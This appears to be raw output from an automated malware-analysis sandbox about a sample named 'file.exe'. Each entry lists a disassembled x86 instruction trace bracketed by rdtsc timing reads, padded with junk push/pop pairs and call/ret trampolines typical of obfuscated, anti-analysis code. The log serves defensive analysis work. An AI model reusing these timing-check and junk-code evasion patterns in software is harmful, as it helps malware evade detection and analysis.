Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62A734 second address: 62A7C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 nop 0x00000008 mov di, EC62h 0x0000000c push dword ptr fs:[00000000h] 0x00000013 mov edi, ecx 0x00000015 mov dword ptr fs:[00000000h], esp 0x0000001c push 00000000h 0x0000001e push ecx 0x0000001f call 00007FCBA4817E78h 0x00000024 pop ecx 0x00000025 mov dword ptr [esp+04h], ecx 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc ecx 0x00000032 push ecx 0x00000033 ret 0x00000034 pop ecx 0x00000035 ret 0x00000036 and ebx, 3BDCC548h 0x0000003c xor edi, dword ptr [ebp+122D1825h] 0x00000042 mov eax, dword ptr [ebp+122D02B9h] 0x00000048 push 00000000h 0x0000004a push edi 0x0000004b call 00007FCBA4817E78h 0x00000050 pop edi 0x00000051 mov dword ptr [esp+04h], edi 0x00000055 add dword ptr [esp+04h], 00000016h 0x0000005d inc edi 0x0000005e push edi 0x0000005f ret 0x00000060 pop edi 0x00000061 ret 0x00000062 sub bh, FFFFFFA7h 0x00000065 push FFFFFFFFh 0x00000067 call 00007FCBA4817E7Fh 0x0000006c mov edi, dword ptr [ebp+122D279Ch] 0x00000072 pop ebx 0x00000073 push eax 0x00000074 push eax 0x00000075 push edx 0x00000076 push esi 0x00000077 push eax 0x00000078 push edx 0x00000079 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62A7C0 second address: 62A7C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62C966 second address: 62C96D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62E7CF second address: 62E7FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCBA46BC746h 0x00000008 jnp 00007FCBA46BC736h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnl 00007FCBA46BC738h 0x0000001a push eax 0x0000001b pop eax 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62F784 second address: 62F789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 630731 second address: 630737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 630737 second address: 630761 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007FCBA4817E78h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 630761 second address: 6307CA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007FCBA46BC738h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 jmp 00007FCBA46BC73Ah 0x00000028 push 00000000h 0x0000002a mov di, 9F92h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebx 0x00000033 call 00007FCBA46BC738h 0x00000038 pop ebx 0x00000039 mov dword ptr [esp+04h], ebx 0x0000003d add dword ptr [esp+04h], 0000001Dh 0x00000045 inc ebx 0x00000046 push ebx 0x00000047 ret 0x00000048 pop ebx 0x00000049 ret 0x0000004a mov di, si 0x0000004d push eax 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 0x00000051 push edx 0x00000052 pop edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 632E35 second address: 632E39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 633CA6 second address: 633D11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push ebx 0x0000000d xor ebx, dword ptr [ebp+122D3926h] 0x00000013 pop ebx 0x00000014 push 00000000h 0x00000016 mov di, si 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007FCBA46BC738h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 0000001Ah 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 movsx ebx, dx 0x00000038 mov edi, dword ptr [ebp+1244B235h] 0x0000003e xchg eax, esi 0x0000003f jmp 00007FCBA46BC743h 0x00000044 push eax 0x00000045 je 00007FCBA46BC748h 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 633D11 second address: 633D15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6308F2 second address: 630908 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCBA46BC73Ch 0x00000008 jnl 00007FCBA46BC736h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 635D28 second address: 635DBC instructions: 0x00000000 rdtsc 0x00000002 jo 00007FCBA4817E76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FCBA4817E78h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 mov ebx, dword ptr [ebp+122D388Eh] 0x0000002b call 00007FCBA4817E82h 0x00000030 jnl 00007FCBA4817E7Ch 0x00000036 pop edi 0x00000037 push 00000000h 0x00000039 jmp 00007FCBA4817E84h 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push edi 0x00000043 call 00007FCBA4817E78h 0x00000048 pop edi 0x00000049 mov dword ptr [esp+04h], edi 0x0000004d add dword ptr [esp+04h], 00000017h 0x00000055 inc edi 0x00000056 push edi 0x00000057 ret 0x00000058 pop edi 0x00000059 ret 0x0000005a mov bl, ah 0x0000005c xchg eax, esi 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 jg 00007FCBA4817E76h 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 635DBC second address: 635DC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 630908 second address: 63090F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 635DC0 second address: 635DC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 635DC6 second address: 635DCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 636D6C second address: 636D76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FCBA46BC736h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 633E98 second address: 633EC1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FCBA4817E80h 0x00000008 jmp 00007FCBA4817E7Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007FCBA4817E82h 0x00000018 jmp 00007FCBA4817E7Ch 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 633EC1 second address: 633ECB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FCBA46BC73Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62C95B second address: 62C966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 638FAF second address: 638FB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 638FB3 second address: 638FBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 638FBB second address: 638FD0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FCBA46BC740h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 638FD0 second address: 638FD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 638FD8 second address: 638FDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 638FDE second address: 639003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FCBA4817E83h 0x0000000e push edi 0x0000000f je 00007FCBA4817E76h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 639003 second address: 639008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 639008 second address: 639012 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCBA4817E7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63E66E second address: 63E67D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FCBA46BC73Ah 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63E67D second address: 63E6BB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCBA4817E7Ah 0x00000008 jp 00007FCBA4817E78h 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 jmp 00007FCBA4817E82h 0x00000019 jmp 00007FCBA4817E80h 0x0000001e popad 0x0000001f push esi 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CC46D second address: 5CC492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FCBA46BC736h 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007FCBA46BC743h 0x00000013 pop edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CC492 second address: 5CC498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 642263 second address: 64228F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA46BC73Fh 0x00000009 jmp 00007FCBA46BC744h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64228F second address: 642293 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 642293 second address: 6422F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC742h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jmp 00007FCBA46BC745h 0x0000000f jne 00007FCBA46BC736h 0x00000015 pop ebx 0x00000016 jo 00007FCBA46BC741h 0x0000001c jmp 00007FCBA46BC73Bh 0x00000021 popad 0x00000022 push ebx 0x00000023 jmp 00007FCBA46BC742h 0x00000028 push eax 0x00000029 push edx 0x0000002a push edx 0x0000002b pop edx 0x0000002c push edi 0x0000002d pop edi 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6422F1 second address: 6422FB instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCBA4817E76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 641948 second address: 64195C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 je 00007FCBA46BC736h 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64195C second address: 641988 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a jo 00007FCBA4817E9Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 jo 00007FCBA4817E76h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 641988 second address: 64198C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 646B14 second address: 646B1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64D732 second address: 64D74D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jp 00007FCBA46BC736h 0x0000000c ja 00007FCBA46BC736h 0x00000012 push edi 0x00000013 pop edi 0x00000014 jnp 00007FCBA46BC736h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64D74D second address: 64D76C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E80h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FCBA4817E7Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64C541 second address: 64C547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64C547 second address: 64C54C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64C54C second address: 64C551 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64C551 second address: 64C559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64CB47 second address: 64CB51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FCBA46BC736h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64CDB6 second address: 64CDBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64CDBA second address: 64CDD8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FCBA46BC736h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007FCBA46BC73Ch 0x00000012 pop eax 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64D40F second address: 64D415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64D415 second address: 64D419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64D59B second address: 64D59F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64D59F second address: 64D5B1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FCBA46BC736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FCBA46BC736h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64D5B1 second address: 64D5D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E81h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnl 00007FCBA4817E76h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6514A2 second address: 6514C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA46BC748h 0x00000009 pop edx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CF86F second address: 5CF874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CF874 second address: 5CF879 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CF879 second address: 5CF883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 655976 second address: 655980 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCBA46BC736h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 655980 second address: 655986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 655986 second address: 65599E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCBA46BC738h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007FCBA46BC736h 0x00000012 jp 00007FCBA46BC736h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65599E second address: 6559B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E87h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D65B7 second address: 5D65BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D65BF second address: 5D65C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D65C3 second address: 5D65E2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCBA46BC736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007FCBA46BC738h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jc 00007FCBA46BC75Ah 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D65E2 second address: 5D65ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D65ED second address: 5D65F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65470F second address: 654731 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E88h 0x00000007 jns 00007FCBA4817E76h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 654731 second address: 65473D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FCBA46BC736h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65473D second address: 654741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623033 second address: 623084 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FCBA46BC73Bh 0x0000000e nop 0x0000000f mov di, 3306h 0x00000013 lea eax, dword ptr [ebp+12482DDCh] 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007FCBA46BC738h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 0000001Dh 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 pushad 0x00000038 popad 0x00000039 jg 00007FCBA46BC736h 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623084 second address: 623089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623089 second address: 602FBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FCBA46BC738h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 mov ecx, eax 0x00000026 mov dx, si 0x00000029 call dword ptr [ebp+122D28EBh] 0x0000002f jc 00007FCBA46BC74Dh 0x00000035 jo 00007FCBA46BC738h 0x0000003b push esi 0x0000003c pop esi 0x0000003d push ecx 0x0000003e push esi 0x0000003f pop esi 0x00000040 jmp 00007FCBA46BC73Bh 0x00000045 pop ecx 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 push edx 0x0000004a pop edx 0x0000004b jg 00007FCBA46BC736h 0x00000051 push edi 0x00000052 pop edi 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6236AF second address: 6236B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6236B5 second address: 6236BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6236BB second address: 6236E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 318B15D5h 0x0000000f push ecx 0x00000010 sub dword ptr [ebp+122D2157h], esi 0x00000016 pop edx 0x00000017 call 00007FCBA4817E79h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 jno 00007FCBA4817E76h 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6236E7 second address: 6236F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBA46BC73Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6236F5 second address: 623751 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jne 00007FCBA4817E80h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jnp 00007FCBA4817E84h 0x0000001c mov eax, dword ptr [eax] 0x0000001e jmp 00007FCBA4817E88h 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 pushad 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623920 second address: 623924 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623924 second address: 62392A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623A36 second address: 623A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
